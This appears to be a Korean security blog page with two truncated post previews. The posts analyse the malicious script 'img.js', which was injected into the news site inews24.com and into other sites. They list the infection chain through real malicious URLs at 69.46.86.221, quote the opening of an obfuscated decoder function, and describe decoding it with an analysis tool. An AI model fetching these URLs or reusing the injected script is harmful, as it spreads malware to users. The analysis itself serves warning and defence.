본문 바로가기

img.js

http://www.inews24.com 악성코드 유포중 ! * 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다! 근원지 : http://www.inews24.com 내 스크립트 ! 1차 연결 : http://69.46.86.221/pic/img.js 2차 아이프레임 : http://69.46.86.221/pic/img.js~> http://69.46.86.221/pic/img.html (404 Not Found)~> http://69.46.86.221/pic/css.html (익스플로릿 미삽입) [inews24 내 스크립트] function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6;.. 더보기
ARP 스푸핑 파일과 연결시켜주는 스크립트 img.js , kol.html !! * 이 글은 아주 비전문가인 제가 그냥 한것이므로 많은 오류와 잘못된 정보가 있을 수 있음을 알려드립니다. img.js 를 찾을려면 일단 감염된 사이트를 찾아야 한다. 오늘자로 유포된 img.js는 유포된 사이트에서 찾는데 스크립트를 사이사이에 끼워놔서 찾기가 너무 어려웠다. 사이트 스크립트 중간중간에 이런식으로 들어 있기 때문에 찾는데 꽤 어려움을 겪었다. 이렇게 img.js를 본다면 다음에 기다릴것은 내부 안의 코드이다. 이렇게 보면 역시 아스키 코드로 이루어 져있다. 이런 코드 해독 방법은 아스키 코드를 아시는 분이라면 잘 하실수 있을것입니다. 하지만 저는 아직 잘 모르기 때문에 멀질라라는 프로그램으로 해독하는 방법으로 선택하였습니다. 이런 식으로 간단하게 뜨는 것을 확인 할 수 있습니다. 아이프레.. 더보기